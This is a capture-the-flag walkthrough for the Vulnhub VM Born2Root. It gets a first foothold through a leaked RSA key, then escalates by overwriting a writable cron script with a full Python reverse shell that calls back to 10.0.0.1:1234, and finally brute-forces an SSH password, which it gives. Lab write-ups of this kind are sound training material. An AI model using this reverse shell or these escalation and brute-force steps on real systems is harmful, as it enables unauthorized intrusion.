Born2Root is available at Vulnhub. This VM is for “Intermediates”. Getting your first shell is easy but getting root is a little more difficult. There are two ways to get root, the “intended” way to get root is not configured correctly so we use brute-forcing instead.
Turn on the machine and use netdiscover to determine the IP of the machine. Then register this IP into your local DNS file “/etc/hosts”.
Run a full port Nmap Scan.
A HTTP Server is running.
Source code of the default web page has nothing useful, so checking “robots.txt” file.
We then try some directory brute-forcing.
These are default Apache directories, checking “/icons/”.
“VDSoyuAXIO.txt” contains RSA private key.
Try logging in as user “martin” using this private key. When prompted for the password, hit enter.
chmod 600 key ssh martin@root.local -i key
We got a lower shell, we need to enumerate more to get root. There are some privilege escalation techniques at https://chryzsh.gitbooks.io/pentestbook/privilege_escalation_-_linux.html that you can use. Type
cat /etc/cron*
There is a file “sekurity.py” which is owned by user “jimmy”. We can write this file with a reverse shell from Pentest monkey.
#!/usr/bin/python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.0.0.1",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
After a while, on our Netcat listener, we got a reverse shell.
There is a file “networker” in Jimmy’s home directory which was created by the author to be used for privilege escalation, but this file is not working properly. Another way to get root is brute-forcing “hadi” using “Hydra” or any other tool. After brute-forcing, we find out that “hadi123” is the SSH password for “hadi”. You can generate the dictionary using “crunch” or “cupp”. Now, try logging in.
Finally, we got ROOT.